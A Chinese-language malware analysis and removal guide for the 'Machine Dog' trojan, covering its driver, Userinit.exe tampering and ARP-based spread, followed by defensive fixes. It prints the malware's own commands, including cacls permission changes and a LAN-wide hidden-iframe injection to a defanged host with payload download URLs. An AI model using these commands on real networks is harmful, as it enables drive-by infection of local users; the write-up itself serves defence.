彻底清除机器狗木马的方法

彻底清除机器狗木马的方法
器狗木马有10多个变种！

%Temp%释放随机命名的P处理，建立pcihdd.sys文件夹 

本身并不判断文件系统，直接P处理，保证pcihdd.sys、userinit.exe不被NTFS文件系统的权限控制： 

Parent process: 
Path: C:\WINNT\system32\CMD.EXE 
PID: 468 
Information: Windows NT Command Processor (Microsoft Corporation) 
Child process: 
Path: C:\WINNT\system32\cacls.exe 
Information: Control ACLs Program (Microsoft Corporation) 
Command line:cacls C:\winnt\system32\drivers\pcihdd.sys /e /p everyone:n 

Parent process: 
Path: C:\WINNT\system32\CMD.EXE 
PID: 468 
Information: Windows NT Command Processor (Microsoft Corporation) 
Child process: 
Path: C:\WINNT\system32\cacls.exe 
Information: Control ACLs Program (Microsoft Corporation) 
Command line:cacls C:\winnt\system32\userinit.exe /e /p everyone:r 

然后释放病毒文件pvc.exe，于192.168.0.1-192.168.0.254网段 

加入框架（病毒）数据包，参数为： 

-idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src=’hXXp://xxx.mmma.biz/js.htm’ width=0 height=0></iframe>" 

病毒行为： 

去除pcihdd.sys的文件属性，并删除原有的pcihdd.sys文件夹。 

然后继续下载： 
h**p://xx*.XXXXX.biz/big.exe 
h**p://xx*.XXXX.biz/big1.exe 

哈哈，自始至终终于见到机器狗了（big.exe） 

第2个是上面分析过的ARP病毒，哈哈``54ing``删掉 

再看看那个机器狗，哈``首先检测pcihdd.sys是否存在。 

若不在则注册该驱动，然后判断条件，如果满足以下条件则退出，不做其他操作： 

1、不是启动分区，比如说双系统。 

2、文件系统，哈哈``不会是针对FAT16的吧 

3、如果是NTFS，使用了文件压缩功能，可能导致病毒驱动在计算Userinnt地址时会出现错误？ 

4、读取Userinnt失败（设置权限），这个版本的小狗应该还不至于出现这情况。 

如果没有意外，则pcihdd.sys访问磁盘底层，读取%SystemRoot%\System32\Userinit.exe 

并修改。（应该会穿过一些还原类的东东`） 

我测试被HIPS自动拒绝，所以。。。。>_< 

能不能穿透影子还不知道。 

被修改后的Userinit.exe，重启系统后联网下载东东： 

至于解决方法，基本有这几条思路： 

1、杀软或HIPS禁止其运行。（对个人PC比较实用） 

2、权限设置，禁止修改Userinit.exe和创建pcihdd.sys。（看起来比较渺茫``HIPS的FD可以） 

3、路由或防火墙那里把hXXp://xxx.mmma.biz屏蔽了 

4、注册表权限，这个比较简单，网吧或局域环境的，操作起来不会太难： 

我的是2K系统，比较麻烦```： 

开始-运行-regedt32（XP系统不用，直接运行regedit就可以！） 

在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ （系统服务） 

建立个名为PciHdd的空键，然后上权限，system和管理员权限的都要设置。 

如果已经有了PciHdd，不用删它，设置为禁止控制和读取 ^_^ 



5、最后一个比较推荐： 

CMD 

cd ……到drivers 

md pcihdd.sys 

cd pcihdd.sys 

md 1...\
彻底清除机器狗木马的方法